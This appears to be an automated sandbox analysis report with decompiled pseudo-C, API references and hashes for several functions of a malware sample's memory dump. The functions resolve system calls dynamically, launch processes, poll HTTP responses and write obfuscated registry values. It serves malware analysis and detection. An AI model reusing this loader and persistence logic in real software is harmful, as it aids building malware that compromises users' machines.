Instruction Fuzzy Hash: CFA19A71901314AFCB11EF64DC84E6A7BE8EF48788F050969F88DD7220DB31D965CB52

Uniqueness

Uniqueness Score: -1.00%

Function 02B87238 Relevance: 13.6, APIs: 9, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E02B87238(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				signed int _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t70;
				void* _t72;
				void* _t75;
				void* _t76;
				intOrPtr _t80;
				WCHAR* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				intOrPtr _t92;
				intOrPtr* _t102;
				signed int _t103;
				void* _t104;
				intOrPtr _t105;
				void* _t107;
				intOrPtr* _t115;
				void* _t119;
				intOrPtr _t125;

				_t58 =  *0x2b8a3dc; // 0x5589cc0
				_v24 = _t58;
				_v28 = 8;
				_v20 = GetTickCount();
				_t60 = E02B86ABD();
				_t103 = 5;
				_t98 = _t60 % _t103 + 6;
				_t62 = E02B86ABD();
				_t117 = _t62 % _t103 + 6;
				_v32 = _t62 % _t103 + 6;
				_t64 = E02B842E9(_t60 % _t103 + 6);
				_v16 = _t64;
				if(_t64 != 0) {
					_t66 = E02B842E9(_t117);
					_v12 = _t66;
					if(_t66 != 0) {
						_push(5);
						_t104 = 0xa;
						_t119 = E02B8398D(_t104,  &_v20);
						if(_t119 == 0) {
							_t119 = 0x2b8918c;
						}
						_t70 = E02B85FA1(_v24);
						_v8 = _t70;
						if(_t70 != 0) {
							_t115 = __imp__;
							_t72 =  *_t115(_t119);
							_t75 =  *_t115(_v8);
							_t76 =  *_t115(_a4);
							_t80 = E02B833DC(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
							_v24 = _t80;
							if(_t80 != 0) {
								_t105 =  *0x2b8a348; // 0x29fd5b8
								_t102 =  *0x2b8a138; // 0x2b87ddd
								_t28 = _t105 + 0x2b8bd10; // 0x530025
								 *_t102(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
								_push(4);
								_t107 = 5;
								_t83 = E02B8398D(_t107,  &_v20);
								_a8 = _t83;
								if(_t83 == 0) {
									_a8 = 0x2b89190;
								}
								_t84 =  *_t115(_a8);
								_t85 =  *_t115(_v8);
								_t86 =  *_t115(_a4);
								_t125 = E02B833DC(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
								if(_t125 == 0) {
									E02B861DA(_v24);
								} else {
									_t92 =  *0x2b8a348; // 0x29fd5b8
									_t44 = _t92 + 0x2b8ba20; // 0x73006d
									 *_t102(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
									 *_a16 = _v24;
									_v28 = _v28 & 0x00000000;
									 *_a20 = _t125;
								}
							}
							E02B861DA(_v8);
						}
						E02B861DA(_v12);
					}
					E02B861DA(_v16);
				}
				return _v28;
			}

0x02b8723e
0x02b87246
0x02b87249
0x02b87256
0x02b87259
0x02b87260
0x02b87267
0x02b8726a
0x02b87277
0x02b8727a
0x02b8727d
0x02b87282
0x02b87287
0x02b8728f
0x02b87294
0x02b87299
0x02b8729f
0x02b872a3
0x02b872ac
0x02b872b0
0x02b872b2
0x02b872b2
0x02b872ba
0x02b872bf
0x02b872c4
0x02b872ca
0x02b872d1
0x02b872e2
0x02b872e9
0x02b872fb
0x02b87300
0x02b87305
0x02b8730e
0x02b87317
0x02b87320
0x02b87336
0x02b8733b
0x02b8733f
0x02b87343
0x02b87348
0x02b8734d
0x02b8734f
0x02b8734f
0x02b87359
0x02b87362
0x02b87369
0x02b87385
0x02b87389
0x02b873c2
0x02b8738b
0x02b8738e
0x02b87396
0x02b873a7
0x02b873af
0x02b873b7
0x02b873bb
0x02b873bb
0x02b87389
0x02b873ca
0x02b873ca
0x02b873d2
0x02b873d2
0x02b873da
0x02b873da
0x02b873e6

APIs

GetTickCount.KERNEL32 ref: 02B87250
lstrlen.KERNEL32(00000000,00000005), ref: 02B872D1
lstrlen.KERNEL32(?), ref: 02B872E2
lstrlen.KERNEL32(00000000), ref: 02B872E9
lstrlenW.KERNEL32(80000002), ref: 02B872F0
lstrlen.KERNEL32(?,00000004), ref: 02B87359
lstrlen.KERNEL32(?), ref: 02B87362
lstrlen.KERNEL32(?), ref: 02B87369
lstrlenW.KERNEL32(?), ref: 02B87370

Part of subcall function 02B861DA: RtlFreeHeap.NTDLL(00000000,00000000,02B86383,00000000,?,00000000,00000000), ref: 02B861E6

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: d7df4d72f6df0e4b28b608cf4fc0470ce5a9b0984559e83b18df61c9a4c2e989
Instruction ID: a2457511d4825209060c01b93436ba97cce4dc427619c4c13e6a5ca96c22df03
Opcode Fuzzy Hash: d7df4d72f6df0e4b28b608cf4fc0470ce5a9b0984559e83b18df61c9a4c2e989
Instruction Fuzzy Hash: 98517F32D40219ABCF11BFA4CC44AEE7BB6EF44358F1580A5ED08A7211DB35CA21DF95

Uniqueness

Uniqueness Score: -1.00%

Function 02B837DF Relevance: 10.6, APIs: 7, Instructions: 109
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E02B837DF(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E02B86BF9(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E02B87AB0( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x2b8a300 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x2b8a348; // 0x29fd5b8
					_t18 = _t47 + 0x2b8b706; // 0x73797325
					_t68 = E02B8127E(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x2b8a348; // 0x29fd5b8
						_t19 = _t50 + 0x2b8b86c; // 0x5588e24
						_t20 = _t50 + 0x2b8b3f6; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E02B85B56();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E02B85B56();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x2b8a2d8, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E02B861DA(_t70);
				goto L12;
			}

0x02b837e7
0x02b837e7
0x02b837f6
0x02b837fd
0x02b83802
0x02b8390f
0x02b83916
0x02b83916
0x02b83811
0x02b83819
0x02b8381c
0x02b83821
0x02b83836
0x02b8383c
0x02b8383d
0x02b83840
0x02b83846
0x02b83849
0x02b8384e
0x02b83856
0x02b83862
0x02b83866
0x02b838f6
0x02b8386c
0x02b8386c
0x02b83871
0x02b83878
0x02b8388c
0x02b83890
0x02b838df
0x02b83892
0x02b83893
0x02b8389a
0x02b838b3
0x02b838b5
0x02b838b9
0x02b838c0
0x02b838da
0x02b838c2
0x02b838cb
0x02b838d0
0x02b838d0
0x02b838c0
0x02b838ee
0x02b838ee
0x02b83866
0x02b838fd
0x02b83906
0x02b8390a
0x00000000

APIs

Part of subcall function 02B86BF9: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02B837FB,?,?,?,?,00000000,00000000), ref: 02B86C1E
Part of subcall function 02B86BF9: GetProcAddress.KERNEL32(00000000,7243775A), ref: 02B86C40
Part of subcall function 02B86BF9: GetProcAddress.KERNEL32(00000000,614D775A), ref: 02B86C56
Part of subcall function 02B86BF9: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02B86C6C
Part of subcall function 02B86BF9: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02B86C82
Part of subcall function 02B86BF9: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02B86C98

memset.NTDLL ref: 02B83849

Part of subcall function 02B8127E: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,02B83862,73797325), ref: 02B8128F
Part of subcall function 02B8127E: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 02B812A9

GetModuleHandleA.KERNEL32(4E52454B,05588E24,73797325), ref: 02B8387F
GetProcAddress.KERNEL32(00000000), ref: 02B83886
HeapFree.KERNEL32(00000000,00000000), ref: 02B838EE

Part of subcall function 02B85B56: GetProcAddress.KERNEL32(36776F57,02B82425), ref: 02B85B71

CloseHandle.KERNEL32(00000000,00000001), ref: 02B838CB
CloseHandle.KERNEL32(?), ref: 02B838D0
GetLastError.KERNEL32(00000001), ref: 02B838D4

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
String ID:
API String ID: 3075724336-0
Opcode ID: fcc967adfa1aef8ac9f1b7abc6ab43474f263678342f8304cc83e0bba4be5e9e
Instruction ID: 74cc23bad7aef948d1b7dea4ce950c35dfda6455b28247da7ba05f8c9e24653b
Opcode Fuzzy Hash: fcc967adfa1aef8ac9f1b7abc6ab43474f263678342f8304cc83e0bba4be5e9e
Instruction Fuzzy Hash: F43121B5D00208AFDB10BFA4DC88D9EBBFDEB04344F1144A5E60AA7110D735AE59DF60

Uniqueness

Uniqueness Score: -1.00%

Function 02B83FA5 Relevance: 10.6, APIs: 7, Instructions: 92
networksynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02B83FA5(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E02B833DC(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E02B861DA(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E02B816B2( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}

0x02b83fa5
0x02b83fa5
0x02b83fb5
0x02b83fb8
0x02b83fbc
0x02b83fc2
0x02b83fc7
0x02b83fe0
0x02b83ff4
0x02b83ffb
0x02b84002
0x02b84055
0x02b8405b
0x02b84061
0x02b8409c
0x02b840a2
0x00000000
0x00000000
0x00000000
0x02b84061
0x02b84008
0x00000000
0x02b8400f
0x02b8401d
0x02b84020
0x02b84023
0x02b8402f
0x02b84033
0x02b84095
0x02b84035
0x02b84047
0x02b84085
0x02b84090
0x02b84049
0x02b8404c
0x02b84050
0x02b84050
0x02b84047
0x00000000
0x02b84033
0x02b84008
0x02b83fcc
0x02b83fd2
0x02b83fd5
0x02b83fda
0x00000000
0x00000000
0x00000000
0x02b8406a
0x02b84072
0x02b84077
0x02b8407a
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,74ACE5D0,00000000,00000000), ref: 02B83FBC
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02B83F34,00000000,?), ref: 02B83FCC
HttpQueryInfoA.WININET(?,20000013,?,?), ref: 02B83FFE
HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02B84023
HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02B84043
GetLastError.KERNEL32 ref: 02B84055

Part of subcall function 02B816B2: WaitForMultipleObjects.KERNEL32(00000002,02B87C47,00000000,02B87C47,?,?,?,02B87C47,0000EA60), ref: 02B816CD

Part of subcall function 02B861DA: RtlFreeHeap.NTDLL(00000000,00000000,02B86383,00000000,?,00000000,00000000), ref: 02B861E6

GetLastError.KERNEL32(00000000), ref: 02B8408A

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID:
API String ID: 3369646462-0
Opcode ID: 87ad78cd0b966121c78cd095ef3b88995a4977527ec071c2d75763e1f728aa1f
Instruction ID: 5c35cedc1d2421a52bf60f95dbcb110e96f02bbc9d3873f9b10a9b483375aae1
Opcode Fuzzy Hash: 87ad78cd0b966121c78cd095ef3b88995a4977527ec071c2d75763e1f728aa1f
Instruction Fuzzy Hash: 283102B5D00709EFDB20EFE5CC84AAFBBF8EB08344F1049A9D54AA2241D771AA44DF51

Uniqueness

Uniqueness Score: -1.00%

Function 02B83A63 Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 02B83ABD
SysAllocString.OLEAUT32(0070006F), ref: 02B83AD1
SysAllocString.OLEAUT32(00000000), ref: 02B83AE3
SysFreeString.OLEAUT32(00000000), ref: 02B83B4B
SysFreeString.OLEAUT32(00000000), ref: 02B83B5A
SysFreeString.OLEAUT32(00000000), ref: 02B83B65

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: a07d9baafac54db4f3ef4feb015e9c9289fcd17a19c712583a5e5764f45941e9
Instruction ID: 77b05e644e13159942f3ea471994073f275a538a1feea78e5f36051593388561
Opcode Fuzzy Hash: a07d9baafac54db4f3ef4feb015e9c9289fcd17a19c712583a5e5764f45941e9
Instruction Fuzzy Hash: 44417135D00A09ABDF01EFFCD844AAEB7BAEF49700F1444A6E915EB210DB71D905CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02B86BF9 Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02B86BF9(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E02B833DC(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x2b8a348; // 0x29fd5b8
					_t1 = _t23 + 0x2b8b436; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x2b8a348; // 0x29fd5b8
					_t2 = _t26 + 0x2b8b85c; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E02B861DA(_t54);
					} else {
						_t30 =  *0x2b8a348; // 0x29fd5b8
						_t5 = _t30 + 0x2b8b849; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x2b8a348; // 0x29fd5b8
							_t7 = _t33 + 0x2b8b72b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x2b8a348; // 0x29fd5b8
								_t9 = _t36 + 0x2b8b883; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x2b8a348; // 0x29fd5b8
									_t11 = _t39 + 0x2b8b87b; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E02B87A08(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x02b86c08
0x02b86c0c
0x02b86cce
0x02b86c12
0x02b86c12
0x02b86c17
0x02b86c2a
0x02b86c2c
0x02b86c31
0x02b86c39
0x02b86c40
0x02b86c42
0x02b86c47
0x02b86cc6
0x02b86cc7
0x02b86c49
0x02b86c49
0x02b86c4e
0x02b86c56
0x02b86c58
0x02b86c5d
0x00000000
0x02b86c5f
0x02b86c5f
0x02b86c64
0x02b86c6c
0x02b86c6e
0x02b86c73
0x00000000
0x02b86c75
0x02b86c75
0x02b86c7a
0x02b86c82
0x02b86c84
0x02b86c89
0x00000000
0x02b86c8b
0x02b86c8b
0x02b86c90
0x02b86c98
0x02b86c9a
0x02b86c9f
0x00000000
0x02b86ca1
0x02b86ca7
0x02b86cac
0x02b86cb3
0x02b86cb8
0x02b86cbd
0x00000000
0x02b86cbf
0x02b86cc2
0x02b86cc2
0x02b86cbd
0x02b86c9f
0x02b86c89
0x02b86c73
0x02b86c5d
0x02b86c47
0x02b86cdc

APIs

Part of subcall function 02B833DC: RtlAllocateHeap.NTDLL(00000000,00000000,02B862F6), ref: 02B833E8

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02B837FB,?,?,?,?,00000000,00000000), ref: 02B86C1E
GetProcAddress.KERNEL32(00000000,7243775A), ref: 02B86C40
GetProcAddress.KERNEL32(00000000,614D775A), ref: 02B86C56
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02B86C6C
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02B86C82
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02B86C98

Part of subcall function 02B87A08: memset.NTDLL ref: 02B87A87

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: 9ad9f1510dfbf814e78dbb9265576d16c00d2eb5709ef9285154dbaa32c8ea02
Instruction ID: 28225f4c0df854112ab65b103cf0f1758357e5d41fe35d99fb0d14936ebc6d6f
Opcode Fuzzy Hash: 9ad9f1510dfbf814e78dbb9265576d16c00d2eb5709ef9285154dbaa32c8ea02
Instruction Fuzzy Hash: 1B210EB150170A9FD711EF6ACD44E6AB7ECEF14748B054856E50DD7211E770EA09CF60

Uniqueness

Uniqueness Score: -1.00%

Function 02B84C94 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E02B84C94(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x2b8a3dc);
					_t91 = 0x80000002;
					L6:
					_t59 = E02B86536( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E02B8313F(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E02B861DA(_a8);
						goto L29;
					}
					_t64 =  *0x2b8a318; // 0x5589e08
					_t16 = _t64 + 0xc; // 0x5589f2b
					_t65 = E02B86536(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d02b890
						if(E02B87767(_t97,  *_t33, _t91, _a8,  *0x2b8a3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x2b8a348; // 0x29fd5b8
							if(_t98 == 0) {
								_t35 = _t68 + 0x2b8bb5a; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x2b8bbac; // 0x55434b48
								_t69 = _t34;
							}
							if(E02B87238(_t69,  *0x2b8a3d4,  *0x2b8a3d8,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x2b8a348; // 0x29fd5b8
									_t44 = _t71 + 0x2b8b332; // 0x74666f53
									_t73 = E02B86536(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d02b890
										E02B85B0E( *_t47, _t91, _a8,  *0x2b8a3d8, _a24);
										_t49 = _t101 + 0x10; // 0x3d02b890
										E02B85B0E( *_t49, _t91, _t99,  *0x2b8a3d0, _a16);
										E02B861DA(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d02b890
									E02B85B0E( *_t40, _t91, _a8,  *0x2b8a3d8, _a24);
									_t43 = _t101 + 0x10; // 0x3d02b890
									E02B85B0E( *_t43, _t91, _a8,  *0x2b8a3d0, _a16);
								}
								if( *_t101 != 0) {
									E02B861DA(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d02b890
					_t81 = E02B858BD( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d02b890
							E02B87767(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E02B861DA(_t100);
						_t98 = _a16;
					}
					E02B861DA(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E02B87AB0(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x2b8a3dc);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

0x02b84c94
0x02b84c9d
0x02b84ca4
0x02b84ca9
0x02b84d16
0x02b84d1c
0x02b84d21
0x02b84d28
0x02b84d2d
0x02b84d32
0x02b84e9d
0x02b84ea4
0x02b84ea4
0x02b84ea9
0x02b84eab
0x02b84eab
0x02b84eb4
0x02b84eb4
0x02b84d38
0x02b84d44
0x02b84e93
0x02b84e96
0x00000000
0x02b84e96
0x02b84d4a
0x02b84d4f
0x02b84d52
0x02b84d57
0x02b84d5c
0x02b84da5
0x02b84da5
0x02b84db8
0x02b84dc2
0x02b84dc8
0x02b84dcf
0x02b84dd9
0x02b84dd9
0x02b84dd1
0x02b84dd1
0x02b84dd1
0x02b84dd1
0x02b84dfb
0x02b84e03
0x02b84e31
0x02b84e36
0x02b84e3d
0x02b84e42
0x02b84e46
0x02b84e78
0x02b84e48
0x02b84e55
0x02b84e58
0x02b84e68
0x02b84e6b
0x02b84e71
0x02b84e71
0x02b84e05
0x02b84e12
0x02b84e15
0x02b84e27
0x02b84e2a
0x02b84e2a
0x02b84e82
0x02b84e8e
0x02b84e84
0x02b84e87
0x02b84e87
0x02b84e82
0x02b84dfb
0x00000000
0x02b84dc2
0x02b84d6b
0x02b84d6e
0x02b84d75
0x02b84d7b
0x02b84d7e
0x02b84d80
0x02b84d8c
0x02b84d8f
0x02b84d8f
0x02b84d95
0x02b84d9a
0x02b84d9a
0x02b84da0
0x00000000
0x02b84da0
0x02b84cae
0x00000000
0x02b84cd5
0x02b84cd5
0x02b84ce1
0x02b84cf4
0x02b84cfa
0x02b84d02
0x00000000
0x02b84d02

APIs

StrChrA.SHLWAPI(02B86A76,0000005F,00000000,00000000,00000104), ref: 02B84CC7
lstrcpy.KERNEL32(?,?), ref: 02B84CF4

Part of subcall function 02B86536: lstrlen.KERNEL32(?,00000000,05589E08,00000000,02B86F0A,0558A02E,43175AC3,?,?,?,?,43175AC3,00000005,02B8A00C,4D283A53,?), ref: 02B8653D
Part of subcall function 02B86536: mbstowcs.NTDLL ref: 02B86566
Part of subcall function 02B86536: memset.NTDLL ref: 02B86578

